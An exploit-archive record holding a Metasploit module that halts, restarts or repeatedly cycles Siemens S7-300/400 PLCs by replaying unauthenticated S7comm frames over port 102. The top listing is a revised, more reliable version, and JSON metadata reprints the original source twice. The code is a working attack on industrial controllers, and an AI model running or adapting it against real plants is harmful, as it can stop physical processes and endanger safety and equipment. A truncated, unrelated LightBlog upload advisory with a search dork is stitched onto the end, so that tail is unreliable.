ID 1337DAY-ID-18989 Type zdt Reporter Dillon Beresford Modified 2012-07-13T00:00:00
Description
Exploit for hardware platform in category remote exploits
# Exploit Title: Siemens Simatic S7 300/400 CPU command module
# Date: 7-13-2012
# Exploit Author: Dillon Beresford
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-300 PLC
# CVE : None
require 'msf/core'
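class Metasploit3 < Msf::Auxiliary
  # Siemens Simatic S7-300/400 CPU START/STOP over ISO-TSAP (TCP/102).
  #
  # The module replays captured TPKT/COTP/S7comm frames that put the CPU into
  # STOP or START.  Nothing in the exchange is authenticated, so anyone who can
  # reach port 102 can halt the process the PLC controls.  Treat every run
  # against a live controller as a process-safety event, MODE 3 doubly so.
  #
  # Fixes relative to the original listing:
  #   * MODE is an OptInt, but the original compared it with the strings
  #     'true'/'false', so its status messages were dead code, and an unset or
  #     unknown MODE fell through to `sock.get_once` on a nil socket.
  #   * `for n in 0..cycles` ran CYCLES+1 times and opened two sockets per
  #     iteration without ever closing them.
  #   * "PLC is running" was printed without reading anything from the PLC.
  #   * Frames were fired 5 ms apart without waiting for the COTP CC / S7 acks.
  #
  # NOTE(review): the original also did `include Rex::Socket::Tcp`; that is a
  # socket implementation mixin, not a module mixin, and everything used here
  # (connect/sock/disconnect) comes from Msf::Exploit::Remote::Tcp.
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner

  # Values accepted by the MODE option.
  MODE_STOP  = 1 # send the STOP sequence once
  MODE_START = 2 # send the START sequence once
  MODE_CYCLE = 3 # alternate STOP / START, CYCLES times

  # Seconds to wait for the PLC's reply to each frame before giving up.
  REPLY_TIMEOUT = 2

  # --- Raw frames, byte-for-byte as in the original capture ------------------
  # Each frame is TPKT (4 bytes) + COTP + S7comm.  They contain nothing
  # host-specific and are replayed verbatim.

  # COTP connection request.  The 0xc1/0xc2 parameters are the source and
  # destination TSAPs; the destination TSAP 01 02 presumably selects rack 0 /
  # slot 2 — TODO confirm and adjust if the CPU sits in a different slot.
  COTP_CR = ("\x03\x00\x00\x16\x11\xe0\x00\x00" \
             "\x00\x01\x00\xc1\x02\x01\x00\xc2" \
             "\x02\x01\x02\xc0\x01\x09").freeze

  # S7comm "setup communication" job (function 0xf0).
  S7_SETUP = ("\x03\x00\x00\x19\x02\xf0\x80\x32" \
              "\x01\x00\x00\xff\xff\x00\x08\x00" \
              "\x00\xf0\x00\x00\x01\x00\x01\x03" \
              "\xc0").freeze

  # Two read-variable jobs (function 0x04) that preceded the control command
  # in the capture; presumably STEP7 status polls.  Kept so the replayed
  # session matches the original exactly.
  S7_READ_A = ("\x03\x00\x00\x1f\x02\xf0\x80\x32" \
               "\x01\x00\x00\x00\x00\x00\x0e\x00" \
               "\x00\x04\x01\x12\x0a\x10\x02\x00" \
               "\x40\x00\x01\x84\x00\x00\x00").freeze

  S7_READ_B = ("\x03\x00\x00\x1f\x02\xf0\x80\x32" \
               "\x01\x00\x00\x00\x01\x00\x0e\x00" \
               "\x00\x04\x01\x12\x0a\x10\x02\x00" \
               "\x10\x00\x00\x83\x00\x00\x00").freeze

  # PLC STOP: function 0x29 with the PI service name "P_PROGRAM".
  S7_STOP = ("\x03\x00\x00\x21\x02\xf0\x80\x32" \
             "\x01\x00\x00\x00\x02\x00\x10\x00" \
             "\x00\x29\x00\x00\x00\x00\x00\x09" \
             "\x50\x5f\x50\x52\x4f\x47\x52\x41" \
             "\x4d").freeze

  # PLC START (warm restart): function 0x28 with the PI service name "P_PROGRAM".
  S7_START = ("\x03\x00\x00\x25\x02\xf0\x80\x32" \
              "\x01\x00\x00\x00\x02\x00\x14\x00" \
              "\x00\x28\x00\x00\x00\x00\x00\x00" \
              "\xfd\x00\x00\x09\x50\x5f\x50\x52" \
              "\x4f\x47\x52\x41\x4d").freeze

  # The original STOP sequence was followed by eight identical status reads;
  # they are replayed so the wire exchange is unchanged.
  STOP_SEQUENCE  = ([COTP_CR, S7_SETUP, S7_READ_A, S7_READ_B, S7_STOP] +
                    [S7_READ_B] * 8).freeze
  START_SEQUENCE = [COTP_CR, S7_SETUP, S7_READ_A, S7_READ_B, S7_START].freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Siemens Simatic S7-300/400 CPU START/STOP Module',
      'Description' => %q{
        The Siemens Simatic S7-300/400 CPU accepts START and STOP commands over
        ISO-TSAP (TCP/102) without authentication. This module replays those
        commands, allowing a remote user to switch the PLC between STOP and
        START and thereby end process control by the PLC.
      },
      'Author'      => 'Dillon Beresford',
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],
          [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],
        ],
      'Version'        => '$Revision$',
      'DisclosureDate' => 'May 09 2011'
    ))

    register_options(
      [
        Opt::RPORT(102),
        # Kept as OptInt for compatibility with the original option name/type;
        # the original text ("Set true ...") did not match the 1/2/3 values
        # the code actually dispatched on.
        OptInt.new('MODE',   [false, '1 = STOP the CPU, 2 = START the CPU, 3 = cycle STOP/START CYCLES times']),
        OptInt.new('CYCLES', [true,  'Number of STOP/START cycles when MODE is 3', 10])
      ], self.class)
  end

  # Scanner entry point, called once per RHOSTS entry.
  #
  # @param ip [String] target address (RPORT is taken from the datastore)
  # @return [void]
  def run_host(ip)
    mode   = datastore['MODE'].to_i   # nil / 'false' / garbage all become 0
    cycles = datastore['CYCLES'].to_i

    case mode
    when MODE_STOP
      print_status("#{ip} - sending CPU STOP")
      report_answered(ip, 'STOP') if send_sequence(ip, STOP_SEQUENCE)
    when MODE_START
      print_status("#{ip} - sending CPU START")
      report_answered(ip, 'START') if send_sequence(ip, START_SEQUENCE)
    when MODE_CYCLE
      if cycles < 1
        print_error("#{ip} - CYCLES must be at least 1 when MODE is 3")
        return
      end
      # Exactly CYCLES iterations (the original's 0..cycles range ran one extra).
      cycles.times do |n|
        print_status("#{ip} - STOP/START cycle #{n + 1}/#{cycles}")
        break unless send_sequence(ip, STOP_SEQUENCE)   # assumes the PLC is in RUN
        break unless send_sequence(ip, START_SEQUENCE)  # assumes the STOP was accepted
      end
    else
      print_error("#{ip} - MODE must be 1 (STOP), 2 (START) or 3 (STOP/START cycle)")
    end
  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
    # Unreachable host or a session the PLC tore down; report instead of
    # swallowing it silently as the original did.
    print_error("#{ip} - #{e.class}: #{e.message}")
  end

  # Opens a fresh ISO-TSAP session, sends +frames+ in order and waits for the
  # PLC's reply to each one before sending the next (the COTP CR must be
  # answered before data frames mean anything).  The session is always closed.
  #
  # @param ip     [String]        target, for messages only
  # @param frames [Array<String>] raw frames to replay
  # @return [Boolean] true when every frame drew a reply, false when the PLC
  #   went silent (the sequence is abandoned at that point)
  def send_sequence(ip, frames)
    connect
    frames.each_with_index do |frame, idx|
      sock.put(frame)
      reply = sock.get_once(-1, REPLY_TIMEOUT)
      if reply.nil?
        print_error("#{ip} - no reply to frame #{idx + 1}/#{frames.length}, abandoning sequence")
        return false
      end
    end
    true
  ensure
    disconnect
  end

  # Reports a fully-answered sequence.  The S7 acknowledgements are not
  # decoded, so "answered" does not prove the CPU actually changed state —
  # a refused request (e.g. a protected CPU) would look the same here.
  #
  # @param ip    [String] target
  # @param label [String] 'STOP' or 'START'
  # @return [void]
  def report_answered(ip, label)
    print_good("#{ip} - PLC answered every frame of the #{label} sequence (iso-tsap port open; reply not decoded)")
  end
end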
{"hash": "c566b0fb60b1b0d39f19f6a96f0516e8ecdbee4792e40d0950aa6e1428a3f19f", "id": "1337DAY-ID-18989", "lastseen": "2018-01-05T09:10:10", "viewCount": 6, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f907225f0567aea22bda182e0f3ad7a8", "key": "description"}, {"hash": "f3c1cf74a97f78a6e4417c3373968c0f", "key": "href"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "modified"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ca21edede029b7f3e7d1d4ed5ab4e6db", "key": "reporter"}, {"hash": "b7bb7c0db1a30cdbce2068cbfa35c3cd", "key": "sourceData"}, {"hash": "79d73b790c2289af856b8c9f7b776f13", "key": "sourceHref"}, {"hash": "f990ff3c76bef81a4670e601fa9b86e1", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-01-05T09:10:10"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18989"]}], "modified": "2018-01-05T09:10:10"}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/18989", "description": "Exploit for hardware platform in category remote exploits", "title": "Siemens Simatic S7-300/400 CPU START/STOP Module", "history": [{"bulletin": {"hash": "0fb071f36986db0374cd7ef7b5afb1e1f9251f3bf7249c774f2886b1c96c812e", "id": "1337DAY-ID-18989", "lastseen": "2016-04-20T01:30:06", "enchantments": {"score": {"value": 8.5, "modified": "2016-04-20T01:30:06"}}, "hashmap": [{"hash": "f907225f0567aea22bda182e0f3ad7a8", "key": "description"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": 
"type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c94494b59125874daeb640d4f018b22a", "key": "sourceHref"}, {"hash": "f990ff3c76bef81a4670e601fa9b86e1", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "modified"}, {"hash": "e009ae992c1321e1e1fc17f8b6d1e9be", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "published"}, {"hash": "d3d589959b43cf4502d9563444e0e806", "key": "sourceData"}, {"hash": "ca21edede029b7f3e7d1d4ed5ab4e6db", "key": "reporter"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/18989", "description": "Exploit for hardware platform in category remote exploits", "viewCount": 2, "title": "Siemens Simatic S7-300/400 CPU START/STOP Module", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title: Siemens Simatic S7 300/400 CPU command module\r\n# Date: 7-13-2012\r\n# Exploit Author: Dillon Beresford\r\n# Vendor Homepage: http://www.siemens.com/\r\n# Tested on: Siemens Simatic S7-300 PLC\r\n# CVE : None\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Rex::Socket::Tcp\r\n include Msf::Auxiliary::Scanner\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module',\r\n 'Description' => %q{\r\n The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP\r\n this modules allows an attacker to perform administrative commands without authentication.\r\n This module allows a remote user to change the state of the PLC between\r\n STOP and START, allowing an attacker to end process control by the PLC.\r\n },\r\n 'Author' => 'Dillon Beresford',\r\n 'License' => MSF_LICENSE,\r\n 
'References' =>\r\n [\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],\r\n ],\r\n 'Version' => '$Revision$',\r\n 'DisclosureDate' => 'May 09 2011'\r\n ))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(102),\r\n OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),\r\n OptInt.new('CYCLES',[true,\"Set the amount of CPU STOP/RUN cycles.\",10])\r\n ], self.class)\r\n end\r\n \r\n def run_host(ip)\r\n begin\r\n \r\n cpu = datastore['MODE'] || ''\r\n cycles = datastore['CYCLES'] || ''\r\n \r\n stop_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x21\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x10\\x00\"+\r\n \"\\x00\\x29\\x00\\x00\\x00\\x00\\x00\\x09\"+\r\n \"\\x50\\x5f\\x50\\x52\\x4f\\x47\\x52\\x41\"+\r\n \"\\x4d\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n 
\r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\"\r\n ]\r\n \r\n start_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \r\n 
\"\\x03\\x00\\x00\\x25\\x02\\xf0\\x80\\x32\"+ \r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x14\\x00\"+\r\n \"\\x00\\x28\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n \"\\xfd\\x00\\x00\\x09\\x50\\x5f\\x50\\x52\"+\r\n \"\\x4f\\x47\\x52\\x41\\x4d\"\r\n \r\n ]\r\n # CPU STOP \r\n if(cpu == 1)\r\n connect()\r\n stop_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # CPU START\r\n if(cpu == 2)\r\n connect()\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # STOP / START CPU\r\n for n in 0..cycles\r\n if(cpu == 3)\r\n connect()\r\n # We assume PLC is up and running (issue a stop command)\r\n stop_cpu_pkt.each do |i| \r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n \r\n connect()\r\n # We assume PLC is has been stopped (issue a start command)\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n end\r\n \r\n data = sock.get_once() \r\n print_good(\"#{ip} PLC is running, iso-tsap port is open.\")\r\n if(cpu == 'true')\r\n print_status(\"Putting the PLC into START mode.\")\r\n elsif(cpu == 'false')\r\n print_status(\"Putting the PLC into STOP mode.\")\r\n end\r\n disconnect()\r\n rescue ::EOFError\r\n end\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-07-13T00:00:00", "references": [], "reporter": "Dillon Beresford", "modified": "2012-07-13T00:00:00", "href": "http://0day.today/exploit/description/18989"}, "lastseen": "2016-04-20T01:30:06", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title: Siemens Simatic S7 300/400 CPU command module\r\n# Date: 7-13-2012\r\n# Exploit Author: Dillon Beresford\r\n# Vendor Homepage: http://www.siemens.com/\r\n# Tested on: Siemens Simatic S7-300 PLC\r\n# CVE : None\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Rex::Socket::Tcp\r\n include 
Msf::Auxiliary::Scanner\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module',\r\n 'Description' => %q{\r\n The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP\r\n this modules allows an attacker to perform administrative commands without authentication.\r\n This module allows a remote user to change the state of the PLC between\r\n STOP and START, allowing an attacker to end process control by the PLC.\r\n },\r\n 'Author' => 'Dillon Beresford',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],\r\n ],\r\n 'Version' => '$Revision$',\r\n 'DisclosureDate' => 'May 09 2011'\r\n ))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(102),\r\n OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),\r\n OptInt.new('CYCLES',[true,\"Set the amount of CPU STOP/RUN cycles.\",10])\r\n ], self.class)\r\n end\r\n \r\n def run_host(ip)\r\n begin\r\n \r\n cpu = datastore['MODE'] || ''\r\n cycles = datastore['CYCLES'] || ''\r\n \r\n stop_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n 
\"\\x03\\x00\\x00\\x21\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x10\\x00\"+\r\n \"\\x00\\x29\\x00\\x00\\x00\\x00\\x00\\x09\"+\r\n \"\\x50\\x5f\\x50\\x52\\x4f\\x47\\x52\\x41\"+\r\n \"\\x4d\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\"\r\n ]\r\n \r\n start_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n 
\"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \r\n \"\\x03\\x00\\x00\\x25\\x02\\xf0\\x80\\x32\"+ \r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x14\\x00\"+\r\n \"\\x00\\x28\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n \"\\xfd\\x00\\x00\\x09\\x50\\x5f\\x50\\x52\"+\r\n \"\\x4f\\x47\\x52\\x41\\x4d\"\r\n \r\n ]\r\n # CPU STOP \r\n if(cpu == 1)\r\n connect()\r\n stop_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # CPU START\r\n if(cpu == 2)\r\n connect()\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # STOP / START CPU\r\n for n in 0..cycles\r\n if(cpu == 3)\r\n connect()\r\n # We assume PLC is up and running (issue a stop command)\r\n stop_cpu_pkt.each do |i| \r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n \r\n connect()\r\n # We assume PLC is has been stopped (issue a start command)\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n end\r\n \r\n data = sock.get_once() \r\n print_good(\"#{ip} PLC is running, iso-tsap port is open.\")\r\n if(cpu == 'true')\r\n print_status(\"Putting the PLC into START mode.\")\r\n elsif(cpu == 'false')\r\n print_status(\"Putting the PLC into STOP mode.\")\r\n end\r\n disconnect()\r\n rescue ::EOFError\r\n end\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2018-01-05] #", "published": "2012-07-13T00:00:00", "references": [], "reporter": "Dillon Beresford", "modified": "2012-07-13T00:00:00", "href": 
"https://0day.today/exploit/description/18989"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "description": " LightBlog 9.5 - REMOTE FILE UPLOAD VULNERABILITY\r\nby Omni\r\n1) Infos\r\n---------\r\nDate : 2008-01-30\r\nProduct : LightBlog\r\nVersion : v 9.5\r\nVendor : http://www.publicwarehouse.co.uk/\r\nVendor Status :\r\n2008-01-31 Informed!\r\n2008-01-31 Patch received from vendor!\r\n2008-02-01 Published!\r\n\r\n\r\nDescription : Lightblog provides webmasters who don't have SQL databases with a fully featured blogging system. Using\r\ntext files to store data, there's no need for complicated installation procedures or a potentially pricey\r\nhosting bill.\r\nDork : "Powered by LightBlog" - Powered by LightBlog\r\nSource : omnipresent - omni - http://omni.netsons.org\r\n\r\nE-mail : omnipresent[at]NOSPAMemail[dot]it - 